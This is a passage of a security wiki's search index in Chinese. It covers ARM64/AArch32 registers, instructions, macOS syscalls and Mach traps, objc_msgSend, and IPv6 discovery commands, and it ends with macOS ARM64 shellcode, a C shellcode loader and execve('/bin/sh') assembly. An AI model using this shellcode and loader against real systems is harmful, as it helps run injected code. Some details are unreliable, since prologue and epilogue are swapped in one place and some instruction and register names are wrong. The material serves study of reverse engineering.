平台寄存器 。它可以用作通用寄存器,但在某些平台上,该寄存器保留给平台特定用途:在 Windows 中指向当前线程环境块,在 Linux kernel 中指向当前正在执行的 task structure。 x19 到 x28 - 这些是被调用者保存的寄存器(callee-saved)。函数必须为其调用者保留这些寄存器的值,因此在函数开始时将它们存到栈中,并在返回前恢复。 x29 - 帧指针 ,用于跟踪栈帧。当因为函数调用创建新栈帧时,x29 寄存器会被 存入栈中 ,新的帧指针地址(即 sp 地址)会存入该寄存器。 此寄存器也可用作 通用寄存器 ,尽管通常用作访问 局部变量 的引用。 x30 或 lr - 链接寄存器 。当执行 BL(Branch with Link)或 BLR(Branch with Link to Register)指令时,它保存 返回地址 ,即将 pc 的值存入该寄存器。 它也可以像其他寄存器一样使用。 如果当前函数要调用新函数从而覆盖 lr,它会在开始时将 lr 存到栈中,这就是 epilogue(stp x29, x30 , [sp, #-48]; mov x29, sp -> 存储 fp 和 lr,分配空间并获取新的 fp),并在结束时恢复,这就是 prologue(ldp x29, x30, [sp], #48; ret -> 恢复 fp 和 lr 并返回)。 sp - 栈指针 ,用于跟踪栈顶。 sp 的值应始终保持至少一个 quadword 对齐 ,否则可能触发对齐异常。 pc - 程序计数器(Program counter) ,指向下一条指令。该寄存器只能通过异常产生、异常返回和分支来更新。唯一可以读取该寄存器的普通指令是带链接的分支指令(BL、BLR),它们将 pc 地址存入 lr(Link Register)。 xzr - 零寄存器(Zero register) 。在 32 位形式中也称为 wzr 。可用于轻松获取零值(常见操作)或使用 subs 执行比较,例如 subs XZR, Xn, #10,将结果存储到无处(即在 xzr 中)。 Wn 寄存器是 Xn 寄存器的 32-bit 版本。 tip 从 X0 到 X18 的寄存器是易失的(volatile),这意味着它们的值可能会被函数调用和中断更改。然而,从 X19 到 X28 的寄存器是非易失的(non-volatile),这意味着它们的值必须在函数调用之间被保留(“callee saved”)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » 寄存器 (ARM64v8)","id":"2100","title":"寄存器 (ARM64v8)"},"2101":{"body":"此外,还有另外 32 个 128-bit 长度的寄存器 ,可用于优化的单指令多数据(SIMD)操作和浮点运算。这些被称为 Vn 寄存器,虽然它们也可以以 64-bit、32-bit、16-bit 和 8-bit 大小操作,此时分别称为 Qn、Dn、Sn、Hn 和 Bn 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » SIMD 和 浮点寄存器","id":"2101","title":"SIMD 和 浮点寄存器"},"2102":{"body":"有数百个系统寄存器 ,也称为特殊用途寄存器(SPRs),用于 监控 和 控制 处理器行为。 它们只能使用专用的特殊指令 mrs 和 msr 读取或设置。 特殊寄存器 TPIDR_EL0 和 TPIDDR_EL0 在逆向工程中经常出现。后缀 EL0 表示该寄存器可被访问的 最低异常级别 (在本例中 EL0 是常规程序运行的特权级别)。 它们通常用于存储线程本地存储(thread-local storage)区的基地址。通常第一个对在 EL0 运行的程序是可读写的,但第二个可以从 EL0 读取并从 EL1 写入(例如内核)。 mrs x0, TPIDR_EL0 ; Read TPIDR_EL0 into x0 msr TPIDR_EL0, X0 ; Write x0 into TPIDR_EL0","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » 系统寄存器","id":"2102","title":"系统寄存器"},"2103":{"body":"PSTATE 包含若干进程组件,这些组件被序列化到操作系统可见的 SPSR_ELx 特殊寄存器中,X 表示触发异常的 权限级别 (这允许在异常结束时恢复进程状态)。 以下是可访问的字段: 条件标志 N、Z、C、V : N 表示操作产生了负结果 Z 表示操作产生了零 C 表示发生了进位(carry) V 表示发生了带符号溢出(signed overflow): 两个正数相加得到负结果。 两个负数相加得到正结果。 在减法中,当从较小的正数中减去较大的负数(或反之),且结果无法在给定位宽表示时发生。 显然处理器并不知道操作是有符号还是无符号的,因此在操作中会检查 C 和 V,并在发生进位时指示出来,无论操作是否有符号。 warning 并非所有指令都会更新这些标志。有些指令如 CMP 或 TST 会更新,其他带有 s 后缀的指令如 ADDS 也会更新它们。 当前 寄存器宽度(nRW)标志 :如果该标志为 0,则程序在恢复时将在 AArch64 执行状态下运行。 当前 异常级别(EL) :在 EL0 运行的常规程序其值为 0。 单步执行(SS) 标志:调试器通过在 SPSR_ELx 内设置 SS 标志为 1 来实现单步。程序将执行一步并触发单步异常。 非法异常状态(IL) 标志:当特权软件执行无效的异常级别转换时使用,该标志被设置为 1 并且处理器触发非法状态异常。 DAIF 标志:这些标志允许特权程序选择性屏蔽某些外部异常。 如果 A 为 1 表示将触发 asynchronous aborts 。I 配置用于响应外部硬件中断请求(IRQs),F 与快速中断请求(FIRs)有关。 栈指针选择(SPS) 标志:在 EL1 及以上运行的特权程序可以在使用它们自己的栈指针寄存器和用户模式的栈指针之间切换(例如在 SP_EL1 和 EL0 之间)。这种切换通过写入 SPSel 特殊寄存器来执行。EL0 无法执行此操作。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » PSTATE","id":"2103","title":"PSTATE"},"2104":{"body":"ARM64 的调用约定规定前 八个参数 使用寄存器 x0 到 x7 传递。 额外 的参数通过 栈 传递。返回值通过寄存器 x0 返回,如果返回值是 128 位长,也可以通过 x1 返回。x19 到 x30 和 sp 在函数调用间必须被 保留 。 在阅读汇编函数时,注意函数的 prologue (序言)和 epilogue (尾声)。 prologue 通常包括 保存帧指针(x29) 、 设置新的帧指针 ,以及 分配栈空间 。 epilogue 通常包括 恢复已保存的帧指针 并 从函数返回 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » 调用约定 (ARM64v8)","id":"2104","title":"调用约定 (ARM64v8)"},"2105":{"body":"Swift 有其自己的 调用约定 ,可以在此找到: https://github.com/apple/swift/blob/main/docs/ABI/CallConvSummary.rst#arm64","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » Swift 中的调用约定","id":"2105","title":"Swift 中的调用约定"},"2106":{"body":"ARM64 指令通常具有 格式 opcode dst, src1, src2 ,其中 opcode 是要执行的操作(如 add、sub、mov 等), dst 是存放结果的目标寄存器, src1 和 src2 是源寄存器。也可以使用立即数作为源操作数。 mov :将一个值从一个 寄存器 移动到另一个寄存器。 示例:mov x0, x1 — 将 x1 的值移到 x0。 ldr :将内存中的值 加载 到寄存器。 示例:ldr x0, [x1] — 从 x1 指向的内存位置加载一个值到 x0。 偏移模式(Offset mode) :偏移量影响源指针,例如: ldr x2, [x1, #8],这会从 x1 + 8 地址加载到 x2 ldr x2, [x0, x1, lsl #2],这会从数组 x0 的位置 x1(索引)*4 处加载一个对象到 x2 预索引模式(Pre-indexed mode) :这会对源地址进行计算,获取结果并同时更新源寄存器为新值。 ldr x2, [x1, #8]!,这会把 x1 + 8 加载到 x2 并将 x1 更新为 x1 + 8 str lr, [sp, #-4]!,将链接寄存器存入 sp 并更新寄存器 sp 后索引模式(Post-index mode) :类似于前一种,但先访问内存地址,然后计算并存储偏移。 ldr x0, [x1], #8,将 x1 的内容加载到 x0,然后将 x1 更新为 x1 + 8 PC 相对寻址 :在这种情况下,要加载的地址是相对于 PC 寄存器计算的 ldr x1, =_start,这会将与当前 PC 相关的 _start 符号的地址加载到 x1。 str :将寄存器的值 存储 到内存。 示例:str x0, [x1] — 将 x0 的值存储到 x1 指向的内存位置。 ldp : 加载成对寄存器(Load Pair) 。该指令从连续内存位置 加载两个寄存器 。内存地址通常由另一个寄存器的值加上偏移形成。 示例:ldp x0, x1, [x2] — 从 x2 和 x2 + 8 的内存位置分别加载 x0 和 x1。 stp : 存储成对寄存器(Store Pair) 。该指令将两个寄存器存到连续的内存位置。内存地址通常由另一个寄存器的值加上偏移形成。 示例:stp x0, x1, [sp] — 将 x0 和 x1 存到 sp 和 sp + 8 的内存位置。 stp x0, x1, [sp, #16]! — 将 x0 和 x1 存到 sp+16 和 sp + 24 的内存位置,并将 sp 更新为 sp+16。 add :将两个寄存器的值相加并将结果存入寄存器。 语法: add(s) Xn1, Xn2, Xn3 | #imm, [shift #N | RRX] Xn1 -> 目标 Xn2 -> 操作数 1 Xn3 | #imm -> 操作数 2(寄存器或立即数) [shift #N | RRX] -> 执行移位或调用 RRX 示例:add x0, x1, x2 — 将 x1 和 x2 的值相加并存入 x0。 add x5, x5, #1, lsl #12 — 等同于 4096(将 1 左移 12 位)-> 1 0000 0000 0000 0000 adds :执行 add 并更新标志 sub :将两个寄存器的值相减并将结果存入寄存器。 参见 add 语法。 示例:sub x0, x1, x2 — 将 x2 从 x1 中减去并将结果存入 x0。 subs :类似于 sub,但会更新标志。 mul :将两个寄存器的值相乘并将结果存入寄存器。 示例:mul x0, x1, x2 — 将 x1 和 x2 的值相乘并存入 x0。 div :将一个寄存器的值除以另一个并将结果存入寄存器。 示例:div x0, x1, x2 — 将 x1 除以 x2 并将结果存入 x0。 lsl、lsr、asr、ror、rrx : 逻辑左移(Logical shift left) :从末尾加入 0,将其他位向前移动(相当于乘以 2 的若干次方) 逻辑右移(Logical shift right) :从前端加入 0,将其他位向后移动(无符号情况下相当于除以 2 的若干次方) 算术右移(Arithmetic shift right) :类似 lsr,但如果最高有效位为 1,则补入 1(有符号情况下相当于除以 2 的若干次方) 循环右移(Rotate right) :类似 lsr,但被移出的位会被附加到左端 带扩展的循环右移(Rotate Right with Extend) :类似 ror,但使用 carry 标志作为“最高有效位”。因此 carry 标志移到位 31,被移出的位进入 carry 标志。 bfm : Bit Field Move ,这些操作将值的位 0...n 拷贝并放置到位置 m..m+n。#s 指定左边界位位置,#r 指定右旋量。 Bitfield move: BFM Xd, Xn, #r Signed Bitfield move: SBFM Xd, Xn, #r, #s Unsigned Bitfield move: UBFM Xd, Xn, #r, #s Bitfield 提取与插入 :从一个寄存器复制位域并拷贝到另一个寄存器。 BFI X1, X2, #3, #4 从 X2 的第 3 位开始插入 4 位到 X1 BFXIL X1, X2, #3, #4 从 X2 的第 3 位提取 4 位并复制到 X1 SBFIZ X1, X2, #3, #4 对 X2 的 4 位进行符号扩展并从位 3 开始插入到 X1,同时将右侧位清零 SBFX X1, X2, #3, #4 从 X2 的第 3 位开始提取 4 位,对其进行符号扩展,并放入 X1 UBFIZ X1, X2, #3, #4 对 X2 的 4 位进行零扩展并从位 3 开始插入到 X1,同时将右侧位清零 UBFX X1, X2, #3, #4 从 X2 的第 3 位开始提取 4 位并将零扩展后的结果放入 X1。 符号扩展到 X(Sign Extend To X) :对值做符号扩展(或无符号情况下填 0)以便进行后续操作: SXTB X1, W2 将 W2 的一个字节的符号扩展到 X1(将 W2 的值扩展到 64 位) SXTH X1, W2 将 W2 的 16 位数符号扩展到 X1 SXTW X1, W2 将 W2 的 32 位数符号扩展到 X1 UXTB X1, W2 对 W2 的一个字节进行零扩展并放入 X1 extr :从指定的两个寄存器连接后的位对中提取位。 示例:EXTR W3, W2, W1, #3 将 W1+W2 进行连接并从 W2 的第 3 位到 W1 的第 3 位提取位并存入 W3。 cmp :比较两个寄存器并设置条件标志。它是 subs 的别名,将目标寄存器设为零寄存器。用于判断 m == n。 它支持与 subs 相同的语法。 示例:cmp x0, x1 — 比较 x0 与 x1 并相应设置条件标志。 cmn :比较负操作数。在这种情况下它是 adds 的别名,支持相同语法。用于判断 m == -n。 ccmp :条件比较,仅当先前的比较为真时才执行并专门设置 nzcv 位。 cmp x1, x2; ccmp x3, x4, 0, NE; blt _func -> 如果 x1 != x2 且 x3 < x4,则跳转到 func 这是因为 ccmp 只有在先前 cmp 为 NE 时才会执行,否则 nzcv 位将被置为 0(这不会满足 blt 比较)。 此外还可以用作 ccmn(同理,但为负,如 cmp 与 cmn 的区别)。 tst :检查比较操作中指定位是否有都为 1(类似于 ANDS,但不存储结果)。用于检查寄存器与某值按位与后是否有任何位为 1。 示例:tst X1, #7 检查 X1 的最低 3 位是否有任一为 1 teq :执行 XOR 操作并丢弃结果 b :无条件分支 示例:b myFunction 注意:这不会将返回地址写入链接寄存器(不适合需要返回的子例程调用) bl :带链接的分支,用于调用子例程。将返回地址存入 x30。 示例:bl myFunction — 调用 myFunction 并将返回地址存入 x30。 注意:这不会将返回地址写入链接寄存器(不适合需要返回的子例程调用) (注:此句与上文重复) blr :带链接到寄存器的分支,用于调用目标地址存于寄存器中的子例程。将返回地址存入 x30。 示例:blr x1 — 调用位于 x1 中的函数地址并将返回地址存入 x30。 ret :从子例程返回,通常使用 x30 中的地址。 示例:ret — 使用 x30 中的返回地址从当前子例程返回。 b. :条件分支 b.eq :若相等则分支,基于上一次的 cmp 指令。 示例:b.eq label — 如果上一条 cmp 指令发现两个值相等,则跳转到 label。 b.ne :若不相等则分支。该指令检查由之前的比较指令设置的条件标志,若比较值不等则分支到指定标签或地址。 示例:在 cmp x0, x1 后,b.ne label — 如果 x0 与 x1 不相等,则跳转到 label。 cbz :比较并在为零时分支。该指令将寄存器与零比较,若相等则分支。 示例:cbz x0, label — 如果 x0 的值为零,则跳转到 label。 cbnz :比较并在非零时分支。该指令将寄存器与零比较,若不相等则分支。 示例:cbnz x0, label — 如果 x0 非零,则跳转到 label。 tbnz :测试位并在非零时分支 示例:tbnz x0, #8, label tbz :测试位并在为零时分支 示例:tbz x0, #8, label 条件选择操作(Conditional select operations) :这些操作的行为基于条件位而变化。 csel Xd, Xn, Xm, cond -> csel X0, X1, X2, EQ -> 若为真,X0 = X1,若为假,X0 = X2 csinc Xd, Xn, Xm, cond -> 若为真,Xd = Xn,若为假,Xd = Xm + 1 cinc Xd, Xn, cond -> 若为真,Xd = Xn + 1,若为假,Xd = Xn csinv Xd, Xn, Xm, cond -> 若为真,Xd = Xn,若为假,Xd = NOT(Xm) cinv Xd, Xn, cond -> 若为真,Xd = NOT(Xn),若为假,Xd = Xn csneg Xd, Xn, Xm, cond -> 若为真,Xd = Xn,若为假,Xd = -Xm cneg Xd, Xn, cond -> 若为真,Xd = -Xn,若为假,Xd = Xn cset Xd, Xn, Xm, cond -> 若为真,Xd = 1,若为假,Xd = 0 csetm Xd, Xn, Xm, cond -> 若为真,Xd = ,若为假,Xd = 0 adrp :计算符号的页地址并将其存入寄存器。 示例:adrp x0, symbol — 计算 symbol 的页地址并存入 x0。 ldrsw :从内存加载带符号的 32-bit 值并将其符号扩展到 64 位。 示例:ldrsw x0, [x1] — 从 x1 指向的内存位置加载一个带符号的 32-bit 值,符号扩展到 64 位并存入 x0。 stur :将寄存器值存到以另一个寄存器为基址并带偏移的内存位置。 示例:stur x0, [x1, #4] — 将 x0 的值存入地址为 x1 + 4 的内存位置。 svc :发起系统调用。代表 “Supervisor Call”。当处理器执行此指令时,会 从用户模式切换到内核模式 并跳转到内核系统调用处理代码所在的指定内存位置。 示例: armasm mov x8, 93 ; Load the system call number for exit (93) into register x8.\\nmov x0, 0 ; Load the exit status code (0) into register x0.\\nsvc 0 ; Make the system call.","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » 常见指令 (ARM64v8)","id":"2106","title":"常见指令 (ARM64v8)"},"2107":{"body":"将链接寄存器和帧指针保存到栈中 : armasm stp x29, x30, [sp, #-16]! ; store pair x29 and x30 to the stack and decrement the stack pointer 设置新的帧指针 : mov x29, sp (为当前函数设置新的帧指针) 为局部变量在栈上分配空间 (如有需要): sub sp, sp, (其中 是所需的字节数)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » 函数序言(Function Prologue)","id":"2107","title":"函数序言(Function Prologue)"},"2108":{"body":"释放局部变量(如果有分配) : add sp, sp, 恢复链接寄存器和帧指针 : armasm ldp x29, x30, [sp], #16 ; load pair x29 and x30 from the stack and increment the stack pointer Return : ret (将控制权返回给调用者,使用链接寄存器中的地址)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » 函数尾部","id":"2108","title":"函数尾部"},"2109":{"body":"Armv8-A 支持执行 32 位程序。 AArch32 可以在 两种指令集 之一运行: A32 和 T32 ,并可通过 interworking 在它们之间切换。 Privileged 64-bit 程序可以通过执行异常级别转移到较低特权的 32 位来安排 32-bit 程序的执行。 注意,从 64 位到 32 位的转换发生在较低的异常级别(例如在 EL1 的 64 位程序触发 EL0 的程序)。这是通过在 AArch32 进程线程准备执行时,将 SPSR_ELx 特殊寄存器的 第 4 位 设置为 1 来完成的,SPSR_ELx 的其余部分保存 AArch32 程序的 CPSR。然后,特权进程调用 ERET 指令,使处理器切换到 AArch32 ,并根据 CPSR 进入 A32 或 T32。 interworking 通过 CPSR 的 J 和 T 位实现。 J=0 且 T=0 表示 A32 ,J=0 且 T=1 表示 T32 。这基本上等同于将 最低位设置为 1 以指示指令集为 T32。 这在 interworking branch instructions 期间设置,但在将 PC 作为目的寄存器时,也可以通过其他指令直接设置。示例: 另一个示例: armasm _start:\\n.code 32 ; Begin using A32\\nadd r4, pc, #1 ; Here PC is already pointing to \\"mov r0, #0\\"\\nbx r4 ; Swap to T32 mode: Jump to \\"mov r0, #0\\" + 1 (so T32) .code 16:\\nmov r0, #0\\nmov r0, #8","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » AARCH32 Execution State","id":"2109","title":"AARCH32 Execution State"},"211":{"body":"要与 IPv6 网络交互,可以使用各种命令: Ping 链路本地地址 :使用 ping6 检查本地设备的存在。 邻居发现 :使用 ip neigh 查看在链路层发现的设备。 alive6 :用于发现同一网络上设备的替代工具。 以下是一些命令示例: bash ping6 –I eth0 -c 5 ff02::1 > /dev/null 2>&1\\nip neigh | grep ^fe80 # Alternatively, use alive6 for neighbor discovery\\nalive6 eth0 IPv6 地址可以从设备的 MAC 地址派生,用于本地通信。以下是如何从已知的 MAC 地址派生链路本地 IPv6 地址的简化指南,以及对 IPv6 地址类型和在网络中发现 IPv6 地址的方法的简要概述。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » IPv6 在网络命令中的实际使用","id":"211","title":"IPv6 在网络命令中的实际使用"},"2110":{"body":"有 16 个 32 位寄存器 (r0-r15)。 从 r0 到 r14 它们可以用于 任何操作 ,不过其中一些通常被保留: r15 : Program counter (always). Contains the address of the next instruction. In A32 current + 8, in T32, current + 4. r11 : Frame Pointer r12 : Intra-procedural call register r13 : Stack Pointer (Note the stack is always 16-byte aligned) r14 : Link Register 此外,寄存器会备份到 banked registries 。这些位置存储寄存器的值,允许在异常处理和特权操作中执行 快速上下文切换 ,避免每次都手动保存和恢复寄存器。 这是通过 将处理器状态从 CPSR 保存到被转入异常的处理器模式的 SPSR 来完成的。在异常返回时, CPSR 会从 SPSR 恢复。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » 寄存器","id":"2110","title":"寄存器"},"2111":{"body":"在 AArch32 中,CPSR 的作用类似于 AArch64 中的 PSTATE ,并且当发生异常时也会存储到 SPSR_ELx 以便稍后恢复执行: 这些字段分为几类: Application Program Status Register (APSR):算术标志,可从 EL0 访问 Execution State Registers:处理器行为(由操作系统管理) Application Program Status Register (APSR)(应用程序状态寄存器) N 、 Z 、 C 、 V 标志(与 AArch64 相同) Q 标志:当在执行专用饱和算术指令期间发生 整数饱和 时会被置为 1。一旦被置为 1 ,它会保持该值直到手动清零。此外,没有任何指令会隐式检查其值,必须手动读取来检查。 GE (Greater than or equal)标志:用于 SIMD(单指令多数据)操作,例如“并行加”和“并行减”。这些操作允许在单条指令中处理多个数据点。 例如, UADD8 指令 并行地对两个 32 位操作数的四对字节相加 ,并将结果存入一个 32 位寄存器。它随后根据这些结果 在 APSR 中设置 GE 标志 。每个 GE 标志对应其中一对字节的相加,指示该字节对的相加是否 溢出 。 SEL 指令使用这些 GE 标志来执行条件动作。 Execution State Registers(执行状态寄存器) J 和 T 位: J 应为 0,若 T 为 0 则使用 A32 指令集,若为 1 则使用 T32。 IT Block State Register (ITSTATE):这些是位 10-15 和 25-26。它们存储 IT 前缀组内指令的条件。 E 位:表示 字节序(endianness) 。 模式和异常屏蔽位(0-4):它们决定当前的执行状态。第 5 位指示程序是以 32bit(为 1)还是 64bit(为 0)运行。其它 4 位表示 当前使用的异常模式 (当发生异常并被处理时)。设置的数值 表示当前优先级 ,以防在处理期间触发另一个异常。 AIF :某些异常可以使用位 A 、I、F 来禁用。如果 A 为 1,表示将触发 异步中止(asynchronous aborts) 。 I 配置用于响应外部硬件 中断请求 (IRQs),而 F 与 快速中断请求 (FIRs)相关。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » CPSR - Current Program Status Register","id":"2111","title":"CPSR - Current Program Status Register"},"2112":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » macOS","id":"2112","title":"macOS"},"2113":{"body":"查看 syscalls.master 或运行 cat /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/include/sys/syscall.h。BSD syscalls 的 x16 会大于 0( x16 > 0 )。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » BSD syscalls","id":"2113","title":"BSD syscalls"},"2114":{"body":"在 syscall_sw.c 中查看 mach_trap_table,在 mach_traps.h 中查看原型。Mach traps 的最大数量是 MACH_TRAP_TABLE_COUNT = 128。Mach traps 的 x16 会小于 0( x16 < 0 ),所以你需要对前面列表中的编号加上 负号 来调用: _kernelrpc_mach_vm_allocate_trap 是 -10 。 你也可以在反汇编器中检查 libsystem_kernel.dylib 来找出如何调用这些(以及 BSD)syscalls: bash # macOS\\ndyldex -e libsystem_kernel.dylib /System/Volumes/Preboot/Cryptexes/OS/System/Library/dyld/dyld_shared_cache_arm64e # iOS\\ndyldex -e libsystem_kernel.dylib /System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm64 Note that Ida and Ghidra can also decompile specific dylibs from the cache just by passing the cache. tip 有时直接查看 libsystem_kernel.dylib 的 反编译 代码比查看 源代码 更容易,因为多个 syscalls(BSD 和 Mach)的代码是通过脚本生成的(查看源代码中的注释),而在 dylib 中你可以找到实际被调用的内容。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » Mach Traps","id":"2114","title":"Mach Traps"},"2115":{"body":"XNU 支持另一类称为 machine dependent 的调用。这些调用的编号依赖于架构,调用本身和编号都不保证保持不变。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » machdep calls","id":"2115","title":"machdep calls"},"2116":{"body":"这是一个由内核拥有的内存页,会映射到每个用户进程的地址空间。其目的是对于那些非常频繁使用的 kernel services,使从用户态到内核态的过渡比通过 syscalls 更快,否则该过渡会非常低效。 For example the call gettimeofdate reads the value of timeval directly from the comm page.","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » comm page","id":"2116","title":"comm page"},"2117":{"body":"It\'s super common to find this function used in Objective-C or Swift programs. This function allows to call a method of an objective-C object. Parameters ( more info in the docs ): x0: self -> Pointer to the instance x1: op -> Selector of the method x2... -> Rest of the arguments of the invoked method So, if you put breakpoint before the branch to this function, you can easily find what is invoked in lldb with (in this example the object calls an object from NSConcreteTask that will run a command): bash # Right in the line were objc_msgSend will be called\\n(lldb) po $x0\\n (lldb) x/s $x1\\n0x1736d3a6e: \\"launch\\" (lldb) po [$x0 launchPath]\\n/bin/sh (lldb) po [$x0 arguments]\\n<__NSArrayI 0x1736801e0>(\\n-c,\\nwhoami\\n) tip 设置环境变量 NSObjCMessageLoggingEnabled=1 ,可以将此函数何时被调用记录到像 /tmp/msgSends-pid 这样的文件中。 此外,设置 OBJC_HELP=1 并调用任意二进制,你可以看到其他可用于 记录 某些 Objc-C 操作何时发生的环境变量。 当调用此函数时,需要找到被指定实例调用的方法,为此会进行多种不同的查找: 执行乐观的缓存查找: 如果成功,则完成 获取 runtimeLock (read) 如果 (realize && !cls->realized) realize class 如果 (initialize && !cls->initialized) initialize class 尝试类自身的缓存: 如果成功,则完成 尝试类的方法列表: 如果找到,则填充缓存并完成 尝试父类缓存: 如果成功,则完成 尝试父类的方法列表: 如果找到,则填充缓存并完成 如果 (resolver) 尝试 method resolver,并从 class lookup 处重复 如果仍然到此(= 所有其它方法都失败)则尝试 forwarder","breadcrumbs":"macOS Security & Privilege Escalation » macOS Apps - Inspecting, debugging and Fuzzing » Introduction to ARM64v8 » objc_msgSend","id":"2117","title":"objc_msgSend"},"2118":{"body":"To compile: bash as -o shell.o shell.s\\nld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib # You could also use this\\nld -o shell shell.o -syslibroot $(xcrun -sdk macosx --show-sdk-path) -lSystem 要提取字节: bash # Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/b729f716aaf24cbc8109e0d94681ccb84c0b0c9e/helper/extract.sh\\nfor c in $(objdump -d \\"s.o\\" | grep -E \'[0-9a-f]+:\' | cut -f 1 | cut -d : -f 2) ; do\\necho -n \'\\\\\\\\x\'$c\\ndone 对于较新的 macOS: bash # Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/fc0742e9ebaf67c6a50f4c38d59459596e0a6c5d/helper/extract.sh\\nfor s in $(objdump -d \\"s.o\\" | grep -E \'[0-9a-f]+:\' | cut -f 1 | cut -d : -f 2) ; do\\necho -n $s | awk \'{for (i = 7; i > 0; i -= 2) {printf \\"\\\\\\\\x\\" substr($0, i, 2)}}\'\\ndone 用于测试 shellcode 的 C 代码\\nc // code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/loader.c\\n// gcc loader.c -o loader\\n#include \\n#include \\n#include \\n#include int (*sc)(); char shellcode[] = \\"\\"; int main(int argc, char **argv) {\\nprintf(\\"[>] Shellcode Length: %zd Bytes\\\\n\\", strlen(shellcode)); void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0); if (ptr == MAP_FAILED) {\\nperror(\\"mmap\\");\\nexit(-1);\\n}\\nprintf(\\"[+] SUCCESS: mmap\\\\n\\");\\nprintf(\\" |-> Return = %p\\\\n\\", ptr); void *dst = memcpy(ptr, shellcode, sizeof(shellcode));\\nprintf(\\"[+] SUCCESS: memcpy\\\\n\\");\\nprintf(\\" |-> Return = %p\\\\n\\", dst); int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ); if (status == -1) {\\nperror(\\"mprotect\\");\\nexit(-1);\\n}\\nprintf(\\"[+] SUCCESS: mprotect\\\\n\\");\\nprintf(\\" |-> Return = %d\\\\n\\", status); printf(\\"[>] Trying to execute shellcode...\\\\n\\"); sc = ptr;\\nsc(); return 0;\\n} Shell 取自 here 并予以说明。 with adr\\nwith stack\\nwith adr for linux armasm .section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.\\n.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.\\n.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4). _main:\\nadr x0, sh_path ; This is the address of \\"/bin/sh\\".\\nmov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve.\\nmov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve.\\nmov x16, #59 ; Move the execve syscall number (59) into x16.\\nsvc #0x1337 ; Make the syscall. The number 0x1337 doesn\'t actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16. sh_path: .asciz \\"/bin/sh\\" armasm .section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.\\n.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.\\n.align 2 ; This directive tells the assembler to align the start of the _main function to the next 4-byte boundary (2^2 = 4). _main:\\n; We are going to build the string \\"/bin/sh\\" and place it on the stack. mov x1, #0x622F ; Move the lower half of \\"/bi\\" into x1. 0x62 = \'b\', 0x2F = \'/\'.\\nmovk x1, #0x6E69, lsl #16 ; Move the next half of \\"/bin\\" into x1, shifted left by 16. 0x6E = \'n\', 0x69 = \'i\'.\\nmovk x1, #0x732F, lsl #32 ; Move the first half of \\"/sh\\" into x1, shifted left by 32. 0x73 = \'s\', 0x2F = \'/\'.\\nmovk x1, #0x68, lsl #48 ; Move the last part of \\"/sh\\" into x1, shifted left by 48. 0x68 = \'h\'. str x1, [sp, #-8] ; Store the value of x1 (the \\"/bin/sh\\" string) at the location `sp - 8`. ; Prepare arguments for the execve syscall. mov x1, #8 ; Set x1 to 8.\\nsub x0, sp, x1 ; Subtract x1 (8) from the stack pointer (sp) and store the result in x0. This is the address of \\"/bin/sh\\" string on the stack.\\nmov x1, xzr ; Clear x1, because we need to pass NULL as the second argument to execve.\\nmov x2, xzr ; Clear x2, because we need to pass NULL as the third argument to execve. ; Make the syscall. mov x16, #59 ; Move the execve syscall number (59) into x16.\\nsvc #0x1337 ; Make the syscall. The number 0x1337 doesn\'t actually matter, because the svc instruction always triggers a supervisor call, and the exact action is determined by the value in x16. armasm ; From https://8ksec.io/arm64-reversing-and-exploitation-part-5-writing-shellcode-8ksec-blogs/\\n.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.\\n.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the 